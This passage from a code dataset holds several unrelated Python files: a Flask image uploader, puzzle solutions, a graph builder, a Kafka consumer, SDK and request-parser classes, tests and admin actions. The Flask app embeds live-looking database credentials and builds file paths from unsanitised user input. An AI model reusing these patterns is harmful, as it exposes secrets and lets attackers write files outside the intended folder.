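        return white >= 5  # True means the bacteria won

    trials = 10000
    print(sum(one_course() for _ in range(trials)) / trials)  # estimated failure rate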
+{"seq_id":"40774951359","text":"from flask import Flask, render_template, request, redirect, url_for, jsonify\nfrom datetime import datetime\nfrom pymongo import MongoClient\n\napp = Flask(__name__)\n\nclient = MongoClient('mongodb+srv://test:sparta@cluster0.0pi7g.mongodb.net/Cluster0?retryWrites=true&w=majority') # filled in when configuring the client\ndb = client.dbsparta\n\n#################################\n##   part that serves HTML    ##\n#################################\n@app.route('/')\ndef home():\n    return render_template('index.html')\n\n# Method 1: store only the file name in the DB and save the image itself on the server machine\n@app.route('/fileupload', methods=['POST'])\ndef file_upload():\n    title_receive = request.form['title_give']\n    file = request.files['file_give']\n    # extract only the extension from the file name\n    extension = file.filename.split('.')[-1]\n    # file names must not collide, so build the name from the current time to keep it unique!\n    today = datetime.now()\n    mytime = today.strftime('%Y-%m-%d-%H-%M-%S')\n    filename = f'{title_receive}-{mytime}'\n    # set the save path (the file is stored on the server machine itself, not in the db)\n    save_to = f'static/{filename}.{extension}'\n    # save the file!\n    file.save(save_to)\n\n    # inserting like below adds the record to the db!\n    doc = {'title':title_receive, 'img':f'{filename}.{extension}'}\n    db.camp.insert_one(doc)\n\n    return jsonify({'result':'success'})\n\n# entering /fileshow/<image title> in the URL passes that image title in as the variable `title`\n@app.route('/fileshow/<title>')\ndef file_show(title):\n    # title is the current image title, so use it to fetch the image file name from the db\n    img_info = db.camp.find_one({'title': title})\n    # pass the image info along for use in the jinja template\n    return render_template('showimg.html', img_info=img_info)\n\nif __name__ == '__main__':\n    app.run('0.0.0.0', port=5000, debug=True)","repo_name":"bae-code/git_prac","sub_path":"test_pic/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2110,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"}
+{"seq_id":"33759724452","text":"def do_part1(my_input):\n    print(\" P A R T 0 1\")\n    print(\"I N I T I A L V A L U E : \"+str(my_input))\n    my_output = 0\n    with open('aoc01-input.txt', 'r') as my_file:\n        for line in my_file:\n            my_output += int(line)\n    print(\" O U T P U T : \"+ str(my_output))\n\ndef do_part2(my_input):\n    print(\" P A R T 0 2\")\n    print(\"I N I T I A L V A L U E : \"+str(my_input))\n    my_freq_history = {my_input}\n    my_freq = 0\n    is_found = False\n\n    with open('aoc01-input.txt', 'r') as my_file:\n        my_lines = my_file.readlines()\n\n    i = 0\n    while (i < len(my_lines)) and not is_found:\n        my_freq += int(my_lines[i])\n        if my_freq in my_freq_history:\n            # repeated frequency found\n            my_output = my_freq\n            is_found = True\n        else:\n            my_freq_history.add(my_freq)\n        i = i + 1\n        if i == len(my_lines) and not is_found:\n            i = 0\n\n    print(\" O U T P U T : \"+ str(my_output))\n\nmy_input = 0\ndo_part1(my_input)\n\ndo_part2(my_input)","repo_name":"robynsen/adventofcode2018","sub_path":"aoc01.py","file_name":"aoc01.py","file_ext":"py","file_size_in_byte":1115,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"}
+{"seq_id":"36991366788","text":"import networkx as nx\nimport re\n\n\nclass ExploreGraph:\n\n    # Creator : Quentin Nater\n    # reviewed by : Sophie Caroni\n    #\n    # asin : string - ID of the node\n    #\n    # Convert the id (ASIN) into an INT unique value\n    def convert_asin_to_int(asin):\n        alphabet = \"ABCDEFGHIJKLMNOPQRSTUVWXYZ\"\n        if any(char.isalpha() for char in asin): # isalpha() returns True if it detects letters\n            for char in asin:\n                if char.isalpha():\n                    asin = asin.replace(char, str(alphabet.index(char.upper()) + 10))\n\n        return int(asin)\n\n    # Creator : Quentin Nater\n    # reviewed by : Sophie Caroni\n    #\n    # filename : string - path to the dataset\n    # limit : int - limit of the line to read (sample)\n    # display : bool - display the results of the analysis\n    # displayDetail : bool - display the detail of the construction\n    #\n    # Construct a complex graph with a file\n    def construct_graph_by_file(file_name, limit=15010574, display=True, displayDetail=False):\n        print(\">> You have called the construction of your graph, please wait :)\")\n\n        # initialization of the variables\n        graph = nx.DiGraph()\n        i, asin_int, notOutEdged = 0, 0, 0\n        list_asin, list_similars, list_not_out_edged, list_not_in_edged, list_extern = [], [], [], [], []\n\n        # read every information of the file (dataset)\n        with open(file_name, \"r\", encoding='utf-8') as f:\n            for line in f:\n                i += 1 # inc break\n\n                # read nodes ===============================================\n                match = 
re.search(r'ASIN:\\s*(\\w+)', line) # each ASIN\n if match:\n asin = match.group(1) # Take the first element matched\n\n # add a node to the graph for the ASIN value (INT)\n asin_int = ExploreGraph.convert_asin_to_int(asin)\n graph.add_node(asin_int)\n list_asin.append(asin_int)\n\n # read edges ===============================================\n match = re.search(r'similar:\\s*(\\w+)', line) # each similar\n if match:\n similars = line.split(sep=\" \") # Create a list of each one of the similars as an element\n inc = 0\n\n for similar in similars:\n inc += 1\n\n if inc > 2: # if more than 0 categories ## ??? categories? why inc > 2? and why 0 and not 2?\n similar_int = ExploreGraph.convert_asin_to_int(similar) # casting\n list_similars.append(similar_int)\n graph.add_edge(*(asin_int, similar_int)) # Add edges between the asin product and each of its similar ones\n\n if displayDetail:\n print(\"\\t\\t\\t\\t(\" + str(asin_int) + \", \" + str(similar_int) + \")\")\n\n elif len(similars) == 2: # information if it has 0 category (CHECK FOR ANALYSIS)\n notOutEdged += 0.5 # because read 2 times\n if notOutEdged % 1 == 0:\n asin_i = ExploreGraph.convert_asin_to_int(asin) # casting\n list_not_out_edged.append(asin_i)\n\n # Stop reading file when the given line limit is reached =======================================\n if i == limit:\n break\n\n nNodes, nEdges = graph.number_of_nodes(), graph.number_of_edges()\n print(\"\\t\\tThe graph has been successfully constructed! (nodes:\" + str(nNodes) + \", edges:\" + str(nEdges) + \")\")\n\n if display:\n list_similars = list(set(list_similars)) # remove redundancy (duplicates)\n list_not_out_edged = set(list_not_out_edged) # casting ## should'nt this be remove redundancy instead of casting?\n\n list_not_in_edged = set(list_asin) - set(list_similars) # find products with asin but not appearing as similars of others\n list_extern = set(list_similars) - set(list_asin) # find products appearing as similars but not defined in this dataset file\n\n total_isolated = list_not_in_edged & list_not_out_edged # find disconnected nodes\n\n print(\"\\t\\t\\t\\tASIN : \\t\\t\\t\\t\\t\\t\\t\" + str(len(list_asin)))\n print(\"\\t\\t\\t\\tSIMILARS (UNIQUES) \\t\\t\\t\\t\" + str(len(list_similars)))\n print(\"\\t\\t\\t\\tNOT IN-EDGED NODES: \\t\\t\\t\" + str(len(list_not_in_edged)))\n print(\"\\t\\t\\t\\tNODES CREATED OUTSIDE (FILE) : \\t\" + str(len(list_extern)))\n print(\"\\t\\t\\t\\tNOT OUT-EDGED NODES: \\t\\t\\t\" + str(int(notOutEdged)))\n print(\"\\t\\t\\t\\tISOLATED NODES: \\t\\t\\t\\t\" + str(len(total_isolated)))\n\n return graph","repo_name":"qnater/GraphProjectNeuroscience","sub_path":"explore/exploration_graph.py","file_name":"exploration_graph.py","file_ext":"py","file_size_in_byte":4880,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"15274859603","text":"from confluent_kafka import Consumer, KafkaException\nfrom elasticsearch import Elasticsearch\nimport json\n\nfrom constant import INDEX_ELASTIC\n\n# Configuration du consommateur Kafka\nconf = {\n 'bootstrap.servers': 'kafka:9092',\n 'group.id': 'my-group',\n 'auto.offset.reset': 'latest' # Commencer à lire à la fin du topic\n}\n\nconsumer = Consumer(conf)\n\n# Configuration d'Elasticsearch\nes = Elasticsearch('http://localhost:9200')\nconsumer.subscribe(['cryptobot'])\n\ntry:\n while True:\n msg = consumer.poll(timeout=1.0) # Récupération des messages du topic\n if msg is None:\n continue\n if msg.error():\n if msg.error().code() == 
KafkaException._PARTITION_EOF:\n continue\n else:\n print(f\"Erreur rencontrée : {msg.error()}\")\n break\n\n # Traitement du message reçu depuis Kafka\n message_data = msg.value().decode('utf-8')\n parsed_message = json.loads(message_data)\n\n # Envoi des données à Elasticsearch\n es.index(index=INDEX_ELASTIC,\n body=parsed_message) # Remplacez 'nom_de_votre_index' par votre index Elasticsearch\nexcept KeyboardInterrupt:\n pass\n\nfinally:\n # Fermeture du consommateur Kafka\n consumer.close()\n","repo_name":"ndiguesene/projet_binance_2023_formation_datascientest_SENE_TALL_DIOUM","sub_path":"populate_base/elasticsearch/app_stream_elastic.py","file_name":"app_stream_elastic.py","file_ext":"py","file_size_in_byte":1280,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"29088066012","text":"from .._protos.public.uac import Collaborator_pb2\nfrom .._protos.public.common import CommonService_pb2\n\nfrom ._visibility import _Visibility\n\n\nclass OrgCustom(_Visibility):\n \"\"\"\n Organization-wide access with manually-specified permissions.\n\n .. note::\n\n With an older ModelDB backend that does not support new permissions\n values, this will be converted to :class:`~verta.visibility.OrgDefault`.\n\n Parameters\n ----------\n write : bool, default False\n Whether to allow organization members to write. ``False`` gives\n read-only access.\n deploy : bool, default False\n Whether to allow organization members to deploy. Only applicable to\n projects and registered models.\n\n Examples\n --------\n .. code-block:: python\n\n from verta.visibility import OrgCustom\n visibility = OrgCustom(write=True, deploy=True)\n client.create_project(\"My Project\", workspace=\"my-org\", visibility=visibility)\n\n \"\"\"\n def __init__(self, write=False, deploy=False):\n if not isinstance(write, bool):\n raise TypeError(\"`write` must be of type bool, not {}\".format(type(write)))\n if not isinstance(deploy, bool):\n raise TypeError(\"`deploy` must be of type bool, not {}\".format(type(deploy)))\n\n self._write = write\n self._deploy = deploy\n\n def __repr__(self):\n return \"<{}(write={}, deploy={}) visibility>\".format(self.__class__.__name__, self._write, self._deploy)\n\n def _to_public_within_org(self):\n # NOTE: old backends will unavoidably not receive `_write` and `_deploy`\n return True\n\n @property\n def _custom_permission(self):\n if self._write:\n collaborator_type = CommonService_pb2.CollaboratorTypeEnum.READ_WRITE\n else:\n collaborator_type = CommonService_pb2.CollaboratorTypeEnum.READ_ONLY\n\n if self._deploy:\n can_deploy = CommonService_pb2.TernaryEnum.TRUE\n else:\n can_deploy = CommonService_pb2.TernaryEnum.FALSE\n\n return Collaborator_pb2.CollaboratorPermissions(\n collaborator_type=collaborator_type,\n can_deploy=can_deploy,\n )\n\n @property\n def _visibility(self):\n return Collaborator_pb2.ResourceVisibility.ORG_CUSTOM\n","repo_name":"orgTestCodacy11KRepos110MB/repo-4483-modeldb","sub_path":"client/verta/verta/visibility/_org_custom.py","file_name":"_org_custom.py","file_ext":"py","file_size_in_byte":2298,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"24669875625","text":"import struct\nimport logging\nimport config\n\n\nMSG_TYPE_GET_SYM_KEY = 1\nMSG_TYPE_SEND_SYM_KEY = 2\nMSG_TYPE_SEND_TXT_MSG = 3\nMSG_TYPE_SEND_FILE = 4\nSUPPORTED_MSG_TYPES = [MSG_TYPE_GET_SYM_KEY, MSG_TYPE_SEND_FILE,\n MSG_TYPE_SEND_SYM_KEY, MSG_TYPE_SEND_TXT_MSG]\n\n# Message request 
fields' sizes\nFIELD_SIZE_MSG_TYPE_SIZE = 1\nFIELD_SIZE_MSG_CONTENT_SIZE = 4\n\nCODE_REGISTER = 1000\nCODE_LIST_CLIENTS = 1001\nCODE_FETCH_PUBLIC_KEY = 1002\nCODE_SEND_MSG = 1003\nCODE_FETCH_MESSAGES = 1004\nSUPPORTED_CODES = (CODE_REGISTER, CODE_LIST_CLIENTS, CODE_SEND_MSG,\n CODE_FETCH_MESSAGES, CODE_FETCH_PUBLIC_KEY)\n\n\nclass RequestHeaderStructure():\n FIELD_CLIENT_ID = (16, 's')\n FIELD_VERSION = (1, 'B')\n FIELD_CODE = (1, 'H')\n FIELD_PAYLOAD_SIZE = (1, 'I')\n\n\nclass Request():\n # header size in bytes\n HEADER_SIZE = 23\n MAX_PAYLOAD_SIZE = 0x7fffffff\n\n\n def __init__(self, raw_data = b\"\"):\n assert type(raw_data) == bytes\n self.__init_logger(self.__class__.__name__)\n\n self.__raw_data = raw_data\n self.__supported_version = config.SUPPORTED_VERSION\n self.is_valid = False\n \n self.__header_struct = struct.Struct(format = self.__get_formatter())\n self.__header = {}\n # important for the header decoding\n self.__init_header()\n \n if raw_data != b\"\":\n if self.decode_header(raw_data) and self.decode_payload(raw_data):\n self.is_valid = True\n \n\n def __get_formatter(self):\n # We are parsing little endian data from the network\n formatter = \">\"\n\n for field, value in vars(RequestHeaderStructure).items():\n if field.isupper():\n formatter += str(value[0]) + value[1]\n \n self.__log_debug(\"Formatter created: {}\".format(formatter))\n return formatter\n\n\n # Decode only the header\n def decode_header(self, raw_data):\n assert type(raw_data) == bytes\n\n if len(raw_data) < Request.HEADER_SIZE:\n self.__log_debug(\"Invalied header size\")\n return False\n\n header = raw_data[: Request.HEADER_SIZE]\n self.__parse_header(header)\n\n if self.__header[\"FIELD_VERSION\"] != self.__supported_version:\n self.__log_debug(\"Unsupported request version\")\n return False\n\n # check if payload size is not huge\n if self.__header[\"FIELD_PAYLOAD_SIZE\"] > Request.MAX_PAYLOAD_SIZE:\n self.__log_debug(\"Payload size unsupported\")\n return False\n\n if self.__header[\"FIELD_CODE\"] not in SUPPORTED_CODES:\n self.__log_debug(\"Invalid request code\")\n return False\n \n return True\n \n #the payload also includes the header!\n def decode_payload(self, raw_data):\n assert type(raw_data) == bytes\n \n if len(raw_data) < Request.HEADER_SIZE:\n self.__log_info(\"Invalid header size\")\n return False\n\n if len(raw_data) > Request.MAX_PAYLOAD_SIZE:\n self.__log_info(\"Received payload of unsupported size\")\n return False\n\n self.__log_debug(len(raw_data[Request.HEADER_SIZE :]))\n\n # validate payload size (TODO: should be done in a function)\n if len(raw_data[Request.HEADER_SIZE :]) != self.__header[\"FIELD_PAYLOAD_SIZE\"]:\n self.__log_debug(\"Invalid payload size\")\n return False\n\n self.__raw_data = raw_data\n\n return True\n\n\n def __init_header(self):\n fields = [field for field in vars(RequestHeaderStructure) if field.isupper()]\n\n for field in fields:\n self.__header.update({field : 0})\n\n\n def __parse_header(self, header):\n unpacked_data = self.__header_struct.unpack(header)\n \n fields = [field for field in vars(RequestHeaderStructure) if field.isupper()]\n\n for index, field in enumerate(fields):\n self.__header[field] = unpacked_data[index]\n\n self.__log_debug(\"Parsed header: {}\".format(self.__header))\n\n\n @property\n def client_id(self):\n return self.__header[\"FIELD_CLIENT_ID\"]\n\n @property\n def client_version(self):\n return self.__header[\"FIELD_VERSION\"]\n\n @property\n def request_code(self):\n return self.__header[\"FIELD_CODE\"]\n\n @property\n def 
payload(self):\n return self.__raw_data[Request.HEADER_SIZE :]\n\n @property\n def raw_data(self):\n return self.__raw_data\n \n @property\n def payload_size(self):\n return self.__header[\"FIELD_PAYLOAD_SIZE\"]\n \n \n def __init_logger(self, logger_name):\n self.__logger = logging.getLogger(logger_name)\n self.__logger.setLevel(logging.DEBUG)\n\n # create handler only once!\n if not self.__logger.hasHandlers(): \n sh = logging.StreamHandler()\n formatter = logging.Formatter(\"%(name)s - %(levelname)s - %(message)s\")\n sh.setFormatter(formatter)\n self.__logger.addHandler(sh)\n\n\n def __log_debug(self, msg):\n self.__logger.debug(msg)\n \n def __log_info(self, msg):\n self.__logger.info(msg)\n \n def __log_critical(self, msg):\n self.__logger.critical(msg)\n \n def __log_exception(self, msg):\n self.__logger.exception(msg)","repo_name":"yakovmora1/SocialNetworkProj","sub_path":"request.py","file_name":"request.py","file_ext":"py","file_size_in_byte":5297,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"33011291214","text":"from collections import defaultdict,deque\n\ndef parallelCourses(n, prerequisites):\n # Write your code here.\n \n graph = defaultdict(list)\n in_coming = defaultdict(int)\n queue = deque()\n ans = 0\n node_count = 0\n\n for a,b in prerequisites:\n graph[a].append(b)\n in_coming[b] += 1\n \n for i in range(1,n+1):\n if in_coming[i] == 0:\n queue.append(i)\n\n\n while queue:\n node_count += len(queue)\n\n for _ in range(len(queue)):\n node = queue.popleft()\n\n for neighbour in graph[node]:\n in_coming[neighbour] -= 1\n\n if in_coming[neighbour] == 0:\n queue.append(neighbour)\n \n ans += 1\n\n if node_count == n:\n return ans\n return -1\n \n \n","repo_name":"YabTek/codeforces","sub_path":"coding-ninjas/parallel-courses.py","file_name":"parallel-courses.py","file_ext":"py","file_size_in_byte":805,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"6739874273","text":"import json\nimport random\nfrom pathlib import Path\nfrom typing import List, Dict, Any\nfrom copy import deepcopy\n\nimport pytest\nfrom faker import Faker\n\nfrom zensearch.store.file import FileStore\nfrom zensearch.model.user import User\nfrom zensearch.model.ticket import Ticket\nfrom zensearch.db.user_ticket_db import UserTicketDatabase\nfrom zensearch.index.inverted import InvertedIndex\nfrom zensearch.model.consts import USER_SCHEMA, TICKET_SCHEMA\n\nN_USERS = 100\nN_TICKETS = 1000\n\n\n@pytest.fixture()\ndef generate_linked_users_tickets():\n faker = Faker()\n users = []\n\n for id in range(N_USERS):\n user_record = USER_SCHEMA.copy()\n user_record[\"_id\"] = id\n user_record[\"name\"] = faker.name()\n user_record[\"_tickets\"] = []\n users.append(User(user_record))\n\n tickets = []\n\n for id in range(N_TICKETS):\n ticket_record = TICKET_SCHEMA.copy()\n\n # assign a random user to the ticket\n user_id = random.randint(0, N_USERS - 1)\n subject = \" \".join(faker.words(3))\n\n ticket_record[\"_id\"] = id\n ticket_record[\"assignee_id\"] = user_id\n ticket_record[\"subject\"] = subject\n tickets.append(Ticket(ticket_record))\n\n # append the ticket subject to its assignee\n users[user_id].record[\"_tickets\"].append(subject)\n return (users, tickets)\n\n\n@pytest.fixture()\ndef db(generate_linked_users_tickets):\n store = FileStore(Path(\"tests/resources\"))\n db = UserTicketDatabase(store)\n db.users = generate_linked_users_tickets[0]\n db.tickets = 
generate_linked_users_tickets[1]\n    db.build_index()\n    return db\n\n\ndef test_ticket_queries_return_linked_assignee(db):\n    db.link_ticket_assignees()\n\n    for ticket in db.tickets:\n        document = db.query(\"tickets\", \"_id\", str(ticket.record[\"_id\"]), related=True)[\n            0\n        ]\n        assert (\n            document[\"assignee_name\"]\n            == db.users[ticket.record[\"assignee_id\"]].record[\"name\"]\n        )\n\n\ndef test_user_queries_return_linked_tickets(db):\n    db.link_users_tickets()\n\n    for user in db.users:\n        document = db.query(\"users\", \"_id\", str(user.id), related=True)[0]\n        assert sorted(document[\"tickets\"]) == sorted(user.record[\"_tickets\"])\n","repo_name":"gh4n/search","sub_path":"tests/integration/test_user_ticket_linkage.py","file_name":"test_user_ticket_linkage.py","file_ext":"py","file_size_in_byte":2234,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"}
+{"seq_id":"42619425179","text":"import os\nfrom typing import List\n\nimport requests\nfrom celery import group, uuid\nfrom flask import redirect, url_for, flash, current_app\nfrom sqlalchemy import or_, and_\n\nfrom app.models import PackageRelease, db, Package, PackageState, PackageScreenshot, MetaPackage, User, \\\n\tNotificationType, PackageUpdateConfig, License, UserRank, PackageType\nfrom app.tasks.emails import send_pending_digests\nfrom app.tasks.forumtasks import import_topic_list, check_all_forum_accounts\nfrom app.tasks.importtasks import import_repo_screenshot, check_zip_release, check_for_updates, update_all_game_support\nfrom app.utils import add_notification, get_system_user\n\nactions = {}\n\n\ndef action(title: str):\n\tdef func(f):\n\t\tname = f.__name__\n\t\tactions[name] = {\n\t\t\t\"title\": title,\n\t\t\t\"func\": f,\n\t\t}\n\n\t\treturn f\n\n\treturn func\n\n\n@action(\"Delete stuck releases\")\ndef del_stuck_releases():\n\tPackageRelease.query.filter(PackageRelease.task_id.isnot(None)).delete()\n\tdb.session.commit()\n\treturn redirect(url_for(\"admin.admin_page\"))\n\n\n@action(\"Import forum topic list\")\ndef do_import_topic_list():\n\t# named do_* so it does not shadow the imported Celery task\n\ttask = import_topic_list.delay()\n\treturn redirect(url_for(\"tasks.check\", id=task.id, r=url_for(\"todo.topics\")))\n\n\n@action(\"Check all forum accounts\")\ndef do_check_all_forum_accounts():\n\t# named do_* so it does not shadow the imported Celery task\n\ttask = check_all_forum_accounts.delay()\n\treturn redirect(url_for(\"tasks.check\", id=task.id, r=url_for(\"admin.admin_page\")))\n\n\n@action(\"Delete unused uploads\")\ndef clean_uploads():\n\tupload_dir = current_app.config['UPLOAD_DIR']\n\n\t(_, _, filenames) = next(os.walk(upload_dir))\n\texisting_uploads = set(filenames)\n\n\tif len(existing_uploads) != 0:\n\t\tdef get_filenames_from_column(column):\n\t\t\tresults = db.session.query(column).filter(column.isnot(None), column != \"\").all()\n\t\t\treturn set([os.path.basename(x[0]) for x in results])\n\n\t\trelease_urls = get_filenames_from_column(PackageRelease.url)\n\t\tscreenshot_urls = get_filenames_from_column(PackageScreenshot.url)\n\t\tpp_urls = get_filenames_from_column(User.profile_pic)\n\n\t\tdb_urls = release_urls.union(screenshot_urls).union(pp_urls)\n\t\tunreachable = existing_uploads.difference(db_urls)\n\n\t\timport sys\n\t\tprint(\"On Disk: \", existing_uploads, file=sys.stderr)\n\t\tprint(\"In DB: \", db_urls, file=sys.stderr)\n\t\tprint(\"Unreachable: \", unreachable, file=sys.stderr)\n\n\t\tfor filename in unreachable:\n\t\t\tos.remove(os.path.join(upload_dir, filename))\n\n\t\tflash(\"Deleted \" + str(len(unreachable)) + \" unreachable uploads\", 
\"success\")\n\telse:\n\t\tflash(\"No downloads to create\", \"danger\")\n\n\treturn redirect(url_for(\"admin.admin_page\"))\n\n\n@action(\"Delete unused mod names\")\ndef del_mod_names():\n\tquery = MetaPackage.query.filter(~MetaPackage.dependencies.any(), ~MetaPackage.packages.any())\n\tcount = query.count()\n\tquery.delete(synchronize_session=False)\n\tdb.session.commit()\n\n\tflash(\"Deleted \" + str(count) + \" unused mod names\", \"success\")\n\treturn redirect(url_for(\"admin.admin_page\"))\n\n\n@action(\"Run update configs\")\ndef run_update_config():\n\tcheck_for_updates.delay()\n\n\tflash(\"Started update configs\", \"success\")\n\treturn redirect(url_for(\"admin.admin_page\"))\n\n\ndef _package_list(packages: List[str]):\n\t# Who needs translations?\n\tif len(packages) >= 3:\n\t\tpackages[len(packages) - 1] = \"and \" + packages[len(packages) - 1]\n\t\tpackages_list = \", \".join(packages)\n\telse:\n\t\tpackages_list = \" and \".join(packages)\n\treturn packages_list\n\n\n@action(\"Send WIP package notification\")\ndef remind_wip():\n\tusers = User.query.filter(User.packages.any(or_(\n\t\t\tPackage.state == PackageState.WIP, Package.state == PackageState.CHANGES_NEEDED)))\n\tsystem_user = get_system_user()\n\tfor user in users:\n\t\tpackages = db.session.query(Package.title).filter(\n\t\t\t\tPackage.author_id == user.id,\n\t\t\t\tor_(Package.state == PackageState.WIP, Package.state == PackageState.CHANGES_NEEDED)) \\\n\t\t\t.all()\n\n\t\tpackages = [pkg[0] for pkg in packages]\n\t\tpackages_list = _package_list(packages)\n\t\thavent = \"haven't\" if len(packages) > 1 else \"hasn't\"\n\n\t\tadd_notification(user, system_user, NotificationType.PACKAGE_APPROVAL,\n\t\t\tf\"Did you forget? {packages_list} {havent} been submitted for review yet\",\n\t\t\t\t\t\t url_for('todo.view_user', username=user.username))\n\tdb.session.commit()\n\n\n@action(\"Send outdated package notification\")\ndef remind_outdated():\n\tusers = User.query.filter(User.maintained_packages.any(\n\t\t\tPackage.update_config.has(PackageUpdateConfig.outdated_at.isnot(None))))\n\tsystem_user = get_system_user()\n\tfor user in users:\n\t\tpackages = db.session.query(Package.title).filter(\n\t\t\t\tPackage.maintainers.contains(user),\n\t\t\t\tPackage.update_config.has(PackageUpdateConfig.outdated_at.isnot(None))) \\\n\t\t\t.all()\n\n\t\tpackages = [pkg[0] for pkg in packages]\n\t\tpackages_list = _package_list(packages)\n\n\t\tadd_notification(user, system_user, NotificationType.PACKAGE_APPROVAL,\n\t\t\t\tf\"The following packages may be outdated: {packages_list}\",\n\t\t\t\t\t\t url_for('todo.view_user', username=user.username))\n\n\tdb.session.commit()\n\n\n@action(\"Import licenses from SPDX\")\ndef import_licenses():\n\trenames = {\n\t\t\"GPLv2\": \"GPL-2.0-only\",\n\t\t\"GPLv3\": \"GPL-3.0-only\",\n\t\t\"AGPLv2\": \"AGPL-2.0-only\",\n\t\t\"AGPLv3\": \"AGPL-3.0-only\",\n\t\t\"LGPLv2.1\": \"LGPL-2.1-only\",\n\t\t\"LGPLv3\": \"LGPL-3.0-only\",\n\t\t\"Apache 2.0\": \"Apache-2.0\",\n\t\t\"BSD 2-Clause / FreeBSD\": \"BSD-2-Clause-FreeBSD\",\n\t\t\"BSD 3-Clause\": \"BSD-3-Clause\",\n\t\t\"CC0\": \"CC0-1.0\",\n\t\t\"CC BY 3.0\": \"CC-BY-3.0\",\n\t\t\"CC BY 4.0\": \"CC-BY-4.0\",\n\t\t\"CC BY-NC-SA 3.0\": \"CC-BY-NC-SA-3.0\",\n\t\t\"CC BY-SA 3.0\": \"CC-BY-SA-3.0\",\n\t\t\"CC BY-SA 4.0\": \"CC-BY-SA-4.0\",\n\t\t\"NPOSLv3\": \"NPOSL-3.0\",\n\t\t\"MPL 2.0\": \"MPL-2.0\",\n\t\t\"EUPLv1.2\": \"EUPL-1.2\",\n\t\t\"SIL Open Font License v1.1\": \"OFL-1.1\",\n\t}\n\n\tfor old_name, new_name in 
renames.items():\n\t\tLicense.query.filter_by(name=old_name).update({ \"name\": new_name })\n\n\tr = requests.get(\n\t\t\t\"https://raw.githubusercontent.com/spdx/license-list-data/master/json/licenses.json\")\n\tlicenses = r.json()[\"licenses\"]\n\n\texisting_licenses = {}\n\tfor license_data in License.query.all():\n\t\tassert license_data.name not in renames.keys()\n\t\texisting_licenses[license_data.name.lower()] = license_data\n\n\tfor license_data in licenses:\n\t\tobj = existing_licenses.get(license_data[\"licenseId\"].lower())\n\t\tif obj:\n\t\t\tobj.url = license_data[\"reference\"]\n\t\telif license_data.get(\"isOsiApproved\") and license_data.get(\"isFsfLibre\") and not license_data[\"isDeprecatedLicenseId\"]:\n\t\t\tobj = License(license_data[\"licenseId\"], True, license_data[\"reference\"])\n\t\t\tdb.session.add(obj)\n\n\tdb.session.commit()\n\n\n@action(\"Delete inactive users\")\ndef delete_inactive_users():\n\tusers = User.query.filter(User.is_active == False, ~User.packages.any(), ~User.forum_topics.any(),\n\t\t\tUser.rank == UserRank.NOT_JOINED).all()\n\tfor user in users:\n\t\tdb.session.delete(user)\n\tdb.session.commit()\n\n\n@action(\"Send Video URL notification\")\ndef remind_video_url():\n\tusers = User.query.filter(User.maintained_packages.any(\n\t\t\tand_(Package.video_url == None, Package.type == PackageType.GAME, Package.state == PackageState.APPROVED)))\n\tsystem_user = get_system_user()\n\tfor user in users:\n\t\tpackages = db.session.query(Package.title).filter(\n\t\t\t\tor_(Package.author == user, Package.maintainers.contains(user)),\n\t\t\t\tPackage.video_url == None,\n\t\t\t\tPackage.type == PackageType.GAME,\n\t\t\t\tPackage.state == PackageState.APPROVED) \\\n\t\t\t.all()\n\n\t\tpackages = [pkg[0] for pkg in packages]\n\t\tpackages_list = _package_list(packages)\n\n\t\tadd_notification(user, system_user, NotificationType.PACKAGE_APPROVAL,\n\t\t\t\tf\"You should add a video to {packages_list}\",\n\t\t\t\t\t\t url_for('users.profile', username=user.username))\n\n\tdb.session.commit()\n\n\n@action(\"Send missing game support notifications\")\ndef remind_missing_game_support():\n\tusers = User.query.filter(\n\t\tUser.maintained_packages.any(and_(\n\t\t\tPackage.state != PackageState.DELETED,\n\t\t\tPackage.type.in_([PackageType.MOD, PackageType.TXP]),\n\t\t\t~Package.supported_games.any(),\n\t\t\tPackage.supports_all_games == False))).all()\n\n\tsystem_user = get_system_user()\n\tfor user in users:\n\t\tpackages = db.session.query(Package.title).filter(\n\t\t\tPackage.maintainers.contains(user),\n\t\t\tPackage.state != PackageState.DELETED,\n\t\t\tPackage.type.in_([PackageType.MOD, PackageType.TXP]),\n\t\t\t~Package.supported_games.any(),\n\t\t\tPackage.supports_all_games == False) \\\n\t\t\t.all()\n\n\t\tpackages = [pkg[0] for pkg in packages]\n\t\tpackages_list = _package_list(packages)\n\n\t\tadd_notification(user, system_user, NotificationType.PACKAGE_APPROVAL,\n\t\t\t\tf\"You need to confirm whether the following packages support all games: {packages_list}\",\n\t\t\t\turl_for('todo.all_game_support', username=user.username))\n\n\tdb.session.commit()\n\n\n@action(\"Detect game support\")\ndef detect_game_support():\n\ttask_id = uuid()\n\tupdate_all_game_support.apply_async((), task_id=task_id)\n\treturn redirect(url_for(\"tasks.check\", id=task_id, r=url_for(\"admin.admin_page\")))\n\n\n@action(\"Send pending notif digests\")\ndef do_send_pending_digests():\n\tsend_pending_digests.delay()\n\n\n@action(\"DANGER: Delete removed packages\")\ndef 
